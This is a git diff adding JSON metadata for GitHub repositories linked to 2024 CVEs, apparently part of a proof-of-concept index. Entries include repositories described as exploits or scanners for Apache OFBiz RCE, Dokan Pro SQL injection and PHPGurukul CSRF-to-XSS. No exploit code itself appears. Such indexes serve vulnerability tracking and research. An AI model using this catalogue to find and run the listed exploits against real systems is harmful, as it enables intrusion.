"login": "Havoc10-sw", + "id": 72911792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72911792?v=4", + "html_url": "https:\/\/github.com\/Havoc10-sw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Havoc10-sw\/Detect_polyfill_CVE-2024-38537-", + "description": "Here's a Python script that checks if the polyfill.io domain is present in the Content Security Policy (CSP) header of a given web application.", + "fork": false, + "created_at": "2024-07-07T15:06:39Z", + "updated_at": "2024-07-07T16:05:21Z", + "pushed_at": "2024-07-07T16:05:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3867.json b/2024/CVE-2024-3867.json new file mode 100644 index 0000000000..d8476ed686 --- /dev/null +++ b/2024/CVE-2024-3867.json @@ -0,0 +1,33 @@ +[ + { + "id": 797589339, + "name": "CVE-2024-3867", + "full_name": "c4cnm\/CVE-2024-3867", + "owner": { + "login": "c4cnm", + "id": 166544186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166544186?v=4", + "html_url": "https:\/\/github.com\/c4cnm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c4cnm\/CVE-2024-3867", + "description": "This repository shows u some information on this vulnerability, which were found by me.", + "fork": false, + "created_at": "2024-05-08T06:19:05Z", + "updated_at": "2024-05-08T06:33:08Z", + "pushed_at": "2024-05-08T06:33:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38793.json b/2024/CVE-2024-38793.json new file mode 100644 index 0000000000..129b447e7e --- /dev/null +++ b/2024/CVE-2024-38793.json @@ -0,0 +1,33 @@ +[ + { + "id": 844081768, + "name": "CVE-2024-38793-PoC", + "full_name": "ret2desync\/CVE-2024-38793-PoC", + "owner": { + "login": "ret2desync", + "id": 101975136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101975136?v=4", + "html_url": "https:\/\/github.com\/ret2desync", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ret2desync\/CVE-2024-38793-PoC", + "description": "Proof of Concept code for exploitation of CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Authenticated (Contributor+) SQL Injection)", + "fork": false, + "created_at": "2024-08-18T10:26:23Z", + "updated_at": "2024-08-18T18:09:55Z", + "pushed_at": "2024-08-18T10:38:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38816.json b/2024/CVE-2024-38816.json new file mode 100644 index 0000000000..5165817e4a --- /dev/null +++ b/2024/CVE-2024-38816.json @@ -0,0 +1,157 @@ +[ + { + "id": 860196818, + "name": "cve-2024-38816-demo", + "full_name": "startsw1th\/cve-2024-38816-demo", + "owner": { + "login": "startsw1th", + "id": 112529608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112529608?v=4", + "html_url": "https:\/\/github.com\/startsw1th", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/startsw1th\/cve-2024-38816-demo", + "description": null, + "fork": false, + "created_at": "2024-09-20T02:09:23Z", + "updated_at": "2024-10-21T10:02:09Z", + "pushed_at": "2024-09-20T02:14:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864697611, + "name": "CVE-2024-38816-PoC", + "full_name": "WULINPIN\/CVE-2024-38816-PoC", + "owner": { + "login": "WULINPIN", + "id": 30523752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30523752?v=4", + "html_url": "https:\/\/github.com\/WULINPIN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WULINPIN\/CVE-2024-38816-PoC", + "description": "CVE-2024-38816 Proof of Concept", + "fork": false, + "created_at": "2024-09-28T23:16:23Z", + "updated_at": "2024-12-11T10:16:53Z", + "pushed_at": "2024-09-26T09:46:19Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 872964642, + "name": "cve-2024-38816", + "full_name": "Galaxy-system\/cve-2024-38816", + "owner": { + "login": "Galaxy-system", + "id": 123049563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123049563?v=4", + "html_url": "https:\/\/github.com\/Galaxy-system", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Galaxy-system\/cve-2024-38816", + "description": null, + "fork": false, + "created_at": "2024-10-15T11:33:13Z", + "updated_at": "2024-10-15T11:33:13Z", + "pushed_at": "2024-10-15T11:33:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 897089761, + "name": "App-vulnerable", + "full_name": "Anthony1078\/App-vulnerable", + "owner": { + "login": "Anthony1078", + "id": 96083496, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96083496?v=4", + "html_url": "https:\/\/github.com\/Anthony1078", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Anthony1078\/App-vulnerable", + "description": " CVE-2024-38816", + "fork": false, + "created_at": "2024-12-02T02:14:49Z", + "updated_at": "2024-12-02T02:15:52Z", + "pushed_at": "2024-12-02T02:15:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 911082607, + "name": "spring-framework", + "full_name": "wdragondragon\/spring-framework", + "owner": { + "login": "wdragondragon", + "id": 47441585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47441585?v=4", + "html_url": "https:\/\/github.com\/wdragondragon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wdragondragon\/spring-framework", + "description": "Fixed cve-2024-38816 based on version 5.3.39", + "fork": false, + "created_at": "2025-01-02T07:50:31Z", + "updated_at": "2025-01-02T07:54:08Z", + "pushed_at": "2025-01-02T08:03:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38819.json b/2024/CVE-2024-38819.json new file mode 100644 index 0000000000..4b4ec0deda --- /dev/null +++ b/2024/CVE-2024-38819.json @@ -0,0 +1,64 @@ +[ + { + "id": 903312018, + "name": "CVE-2024-38819-POC", + "full_name": "masa42\/CVE-2024-38819-POC", + "owner": { + "login": "masa42", + "id": 46730934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46730934?v=4", + "html_url": "https:\/\/github.com\/masa42", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/masa42\/CVE-2024-38819-POC", + "description": null, + "fork": false, + "created_at": "2024-12-14T09:22:33Z", + "updated_at": "2025-01-06T16:52:02Z", + "pushed_at": "2024-12-14T10:13:45Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 33, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 904096436, + "name": "CVE-2024-38819", + "full_name": "GhostS3c\/CVE-2024-38819", + "owner": { + "login": "GhostS3c", + "id": 190174780, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/190174780?v=4", + "html_url": "https:\/\/github.com\/GhostS3c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GhostS3c\/CVE-2024-38819", + "description": "CVE-2024-38819 nuclei template", + "fork": false, + "created_at": "2024-12-16T08:48:12Z", + "updated_at": "2024-12-18T02:01:48Z", + "pushed_at": "2024-12-16T08:49:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38821.json b/2024/CVE-2024-38821.json new file mode 100644 index 0000000000..5edeac022f --- /dev/null +++ b/2024/CVE-2024-38821.json @@ -0,0 +1,33 @@ +[ + { + "id": 880884921, + "name": "cve-2024-38821", + "full_name": "mouadk\/cve-2024-38821", + "owner": { + "login": "mouadk", + "id": 32769487, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32769487?v=4", + "html_url": "https:\/\/github.com\/mouadk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mouadk\/cve-2024-38821", + "description": "cve-2024-38821", + "fork": false, + "created_at": "2024-10-30T14:38:37Z", + "updated_at": "2024-11-14T01:22:38Z", + "pushed_at": "2024-10-30T15:17:54Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38856.json b/2024/CVE-2024-38856.json new file mode 100644 index 0000000000..92f46e78c2 --- /dev/null +++ b/2024/CVE-2024-38856.json @@ -0,0 +1,258 @@ +[ + { + "id": 839631817, + "name": "CVE-2024-38856_Scanner", + "full_name": "securelayer7\/CVE-2024-38856_Scanner", + "owner": { + "login": "securelayer7", + "id": 14994455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14994455?v=4", + "html_url": "https:\/\/github.com\/securelayer7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securelayer7\/CVE-2024-38856_Scanner", + "description": "Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)", + "fork": false, + "created_at": "2024-08-08T02:40:56Z", + "updated_at": "2024-12-22T14:51:44Z", + "pushed_at": "2024-10-02T15:59:28Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "apache-ofbiz", + "cve-scanning", + "exploit", + "exploitation", + "rce-exploit", + "rce-scanner" + ], + "visibility": "public", + "forks": 11, + "watchers": 40, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840564456, + "name": "CVE-2024-38856", + "full_name": "ThatNotEasy\/CVE-2024-38856", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2024-38856", + "description": "Perform With Massive Apache OFBiz Zero-Day Scanner & RCE", + "fork": false, + "created_at": "2024-08-10T03:05:34Z", + "updated_at": "2024-11-20T16:31:00Z", + "pushed_at": "2024-08-10T03:14:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844163753, + "name": "CVE-2024-38856-ApacheOfBiz", + "full_name": "Praison001\/CVE-2024-38856-ApacheOfBiz", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-38856-ApacheOfBiz", + "description": "Exploit for CVE-2024-38856 affecting Apache OFBiz versions before 18.12.15", + "fork": false, + "created_at": "2024-08-18T15:19:58Z", + "updated_at": "2024-09-02T09:19:33Z", + "pushed_at": "2024-08-18T15:27:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 845856356, + "name": "CVE-2024-38856-EXP", + "full_name": "0x20c\/CVE-2024-38856-EXP", + "owner": { + "login": "0x20c", + "id": 25526653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25526653?v=4", + "html_url": "https:\/\/github.com\/0x20c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x20c\/CVE-2024-38856-EXP", + "description": "CVE-2024-38856 Exploit", + "fork": false, + "created_at": "2024-08-22T04:05:02Z", + "updated_at": "2024-09-06T11:18:59Z", + "pushed_at": "2024-08-22T04:19:48Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848488270, + "name": "CVE-2024-38856", + "full_name": "emanueldosreis\/CVE-2024-38856", + "owner": { + "login": "emanueldosreis", + "id": 5330737, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5330737?v=4", + "html_url": "https:\/\/github.com\/emanueldosreis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emanueldosreis\/CVE-2024-38856", + "description": "Nuclei template to scan for Apache Ofbiz affecting versions before 18.12.15", + "fork": false, + "created_at": "2024-08-27T21:16:09Z", + "updated_at": "2024-08-28T12:04:31Z", + "pushed_at": "2024-08-28T12:04:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848587568, + "name": "CVE-2024-38856-RCE", + "full_name": "BBD-YZZ\/CVE-2024-38856-RCE", + "owner": { + "login": "BBD-YZZ", + "id": 132546612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4", + "html_url": "https:\/\/github.com\/BBD-YZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBD-YZZ\/CVE-2024-38856-RCE", + "description": "Apache OFBiz CVE-2024-38856", + "fork": false, + "created_at": "2024-08-28T03:17:22Z", + "updated_at": "2024-09-05T11:53:50Z", + "pushed_at": "2024-08-28T06:36:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892921079, + "name": "cve-2024-38856-poc", + "full_name": "XiaomingX\/cve-2024-38856-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-38856-poc", + "description": "CVE-2024-38856 是 Apache OFBiz 中的一个严重漏洞,允许未经身份验证的攻击者在受影响的系统上执行任意代码。 ", + "fork": false, + "created_at": "2024-11-23T03:54:28Z", + "updated_at": "2024-12-08T18:37:06Z", + "pushed_at": "2024-11-23T03:57:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 911249722, + "name": "CVE-2024-38856_Scen", + "full_name": "FakesiteSecurity\/CVE-2024-38856_Scen", + "owner": { + "login": "FakesiteSecurity", + "id": 193509744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/193509744?v=4", + "html_url": "https:\/\/github.com\/FakesiteSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FakesiteSecurity\/CVE-2024-38856_Scen", + "description": "Tentang Pemindai & Eksploitasi Apache OFBiz RCE (CVE-2024-38856)", + "fork": false, + "created_at": "2025-01-02T15:25:31Z", + "updated_at": "2025-01-02T20:41:30Z", + "pushed_at": "2025-01-02T15:27:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38998.json b/2024/CVE-2024-38998.json new file mode 100644 index 0000000000..9dada12694 --- /dev/null +++ b/2024/CVE-2024-38998.json @@ -0,0 +1,33 @@ +[ + { + "id": 902615056, + "name": "PP_CVE-2024-38998", + "full_name": "z3ldr1\/PP_CVE-2024-38998", + "owner": { + "login": "z3ldr1", + "id": 128452420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128452420?v=4", + "html_url": "https:\/\/github.com\/z3ldr1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3ldr1\/PP_CVE-2024-38998", + "description": "Uma vulnerabilidade (CVE-2024-38998) foi identificada na versão 2.3.6 do módulo JavaScript requirejs. Ela explora prototype pollution na função config, permitindo que invasores modifiquem Object.prototype com entradas maliciosas. Isso pode causar DoS, execução remota de código (RCE) ou XSS. A gravidade é crítica (CVSS 9.8). ", + "fork": false, + "created_at": "2024-12-12T23:19:44Z", + "updated_at": "2024-12-20T00:37:10Z", + "pushed_at": "2024-12-12T23:20:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39031.json b/2024/CVE-2024-39031.json new file mode 100644 index 0000000000..3f6b6002f7 --- /dev/null +++ b/2024/CVE-2024-39031.json @@ -0,0 +1,33 @@ +[ + { + "id": 826000412, + "name": "CVE-2024-39031", + "full_name": "toneemarqus\/CVE-2024-39031", + "owner": { + "login": "toneemarqus", + "id": 85018947, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85018947?v=4", + "html_url": "https:\/\/github.com\/toneemarqus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/toneemarqus\/CVE-2024-39031", + "description": "Stored Cross-Side Scripting (XSS) leads to privilege escalation in SilverPeas social-networking portal", + "fork": false, + "created_at": "2024-07-08T23:21:52Z", + "updated_at": "2024-07-24T04:41:12Z", + "pushed_at": "2024-07-24T04:41:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39069.json b/2024/CVE-2024-39069.json new file mode 100644 index 0000000000..4a14054f9c --- /dev/null +++ b/2024/CVE-2024-39069.json @@ -0,0 +1,33 @@ +[ + { + "id": 826264577, + "name": "CVE-2024-39069", + "full_name": "AungSoePaing\/CVE-2024-39069", + "owner": { + "login": "AungSoePaing", + "id": 76258644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76258644?v=4", + "html_url": "https:\/\/github.com\/AungSoePaing", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AungSoePaing\/CVE-2024-39069", + "description": "CVE-2024-39069", + "fork": false, + "created_at": "2024-07-09T11:24:44Z", + "updated_at": "2024-07-09T13:29:18Z", + "pushed_at": "2024-07-09T13:29:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39081.json b/2024/CVE-2024-39081.json new file mode 100644 index 0000000000..76e5ce359a --- /dev/null +++ b/2024/CVE-2024-39081.json @@ -0,0 +1,33 @@ +[ + { + "id": 782335847, + "name": "BLE-TPMS", + "full_name": "Amirasaiyad\/BLE-TPMS", + "owner": { + "login": "Amirasaiyad", + "id": 134613441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134613441?v=4", + "html_url": "https:\/\/github.com\/Amirasaiyad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Amirasaiyad\/BLE-TPMS", + "description": "CVE-2024-39081. BLE TPMS data manipulation over bluetooth communication.", + "fork": false, + "created_at": "2024-04-05T05:13:27Z", + "updated_at": "2024-09-18T11:36:16Z", + "pushed_at": "2024-09-18T11:36:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39090.json b/2024/CVE-2024-39090.json new file mode 100644 index 0000000000..4c8ce7e5b5 --- /dev/null +++ b/2024/CVE-2024-39090.json @@ -0,0 +1,33 @@ +[ + { + "id": 895097713, + "name": "CVE-2024-39090-PoC", + "full_name": "ghostwirez\/CVE-2024-39090-PoC", + "owner": { + "login": "ghostwirez", + "id": 64195231, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64195231?v=4", + "html_url": "https:\/\/github.com\/ghostwirez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ghostwirez\/CVE-2024-39090-PoC", + "description": "This PoC script exploits CVE-2024-39090, a CSRF to Stored XSS vulnerability in PHPGurukul Online Shopping Portal v2.0. It automates CSRF attacks to inject persistent JavaScript payloads, which execute when a privileged user accesses the affected page, enabling actions such as session hijacking or credential theft.", + "fork": false, + "created_at": "2024-11-27T14:55:58Z", + "updated_at": "2024-11-29T03:05:46Z", + "pushed_at": "2024-11-29T01:02:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39203.json b/2024/CVE-2024-39203.json new file mode 100644 index 0000000000..b1a8c7dce2 --- /dev/null +++ b/2024/CVE-2024-39203.json @@ -0,0 +1,33 @@ +[ + { + "id": 823919362, + "name": "CVE-2024-39203", + "full_name": "5r1an\/CVE-2024-39203", + "owner": { + "login": "5r1an", + "id": 174668848, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174668848?v=4", + "html_url": "https:\/\/github.com\/5r1an", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/5r1an\/CVE-2024-39203", + "description": "A cross-site scripting (XSS) vulnerability in the Backend Theme. Management module of Z-BlogPHP v1.7.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.", + "fork": false, + "created_at": "2024-07-04T02:30:17Z", + "updated_at": "2024-07-04T02:30:17Z", + "pushed_at": "2024-07-04T02:30:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39205.json b/2024/CVE-2024-39205.json new file mode 100644 index 0000000000..2255a89ad6 --- /dev/null +++ b/2024/CVE-2024-39205.json @@ -0,0 +1,37 @@ +[ + { + "id": 878732098, + "name": "CVE-2024-39205-Pyload-RCE", + "full_name": "Marven11\/CVE-2024-39205-Pyload-RCE", + "owner": { + "login": "Marven11", + "id": 110723864, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110723864?v=4", + "html_url": "https:\/\/github.com\/Marven11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Marven11\/CVE-2024-39205-Pyload-RCE", + "description": "Pyload RCE with js2py sandbox escape ", + "fork": false, + "created_at": "2024-10-26T01:01:35Z", + "updated_at": "2024-12-02T06:55:31Z", + "pushed_at": "2024-10-26T01:11:57Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "pyload", + "rce" + ], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39210.json b/2024/CVE-2024-39210.json new file mode 100644 index 0000000000..e17a7e3a7b --- /dev/null +++ b/2024/CVE-2024-39210.json @@ -0,0 +1,33 @@ +[ + { + "id": 824474537, + "name": "CVE-2024-39210", + "full_name": "KRookieSec\/CVE-2024-39210", + "owner": { + "login": "KRookieSec", + "id": 43315052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43315052?v=4", + "html_url": "https:\/\/github.com\/KRookieSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KRookieSec\/CVE-2024-39210", + "description": "Best house rental management system Local file contains vulnerability ", + "fork": false, + "created_at": "2024-07-05T08:01:22Z", + "updated_at": "2024-11-09T13:59:02Z", + "pushed_at": "2024-07-05T08:02:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39211.json b/2024/CVE-2024-39211.json new file mode 100644 index 0000000000..efa31f1739 --- /dev/null +++ b/2024/CVE-2024-39211.json @@ -0,0 +1,33 @@ +[ + { + "id": 824057577, + "name": "CVE-2024-39211", + "full_name": "artemy-ccrsky\/CVE-2024-39211", + "owner": { + "login": "artemy-ccrsky", + "id": 33719402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33719402?v=4", + "html_url": "https:\/\/github.com\/artemy-ccrsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/artemy-ccrsky\/CVE-2024-39211", + "description": "CVE-2024-39211", + "fork": false, + "created_at": "2024-07-04T09:24:34Z", + "updated_at": "2024-12-05T10:52:00Z", + "pushed_at": "2024-07-08T13:00:44Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3922.json b/2024/CVE-2024-3922.json new file mode 100644 index 0000000000..b7fabc990d --- /dev/null +++ b/2024/CVE-2024-3922.json @@ -0,0 +1,33 @@ +[ + { + "id": 814025007, + "name": "CVE-2024-3922-Poc", + "full_name": "truonghuuphuc\/CVE-2024-3922-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3922-Poc", + "description": "Dokan Pro <= 3.10.3 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-06-12T07:42:10Z", + "updated_at": "2024-06-26T12:02:43Z", + "pushed_at": "2024-06-12T08:03:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39248.json b/2024/CVE-2024-39248.json new file mode 100644 index 0000000000..b62ae86528 --- /dev/null +++ b/2024/CVE-2024-39248.json @@ -0,0 +1,33 @@ +[ + { + "id": 820622884, + "name": "CVE-2024-39248", + "full_name": "jasonthename\/CVE-2024-39248", + "owner": { + "login": "jasonthename", + "id": 19846828, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19846828?v=4", + "html_url": "https:\/\/github.com\/jasonthename", + 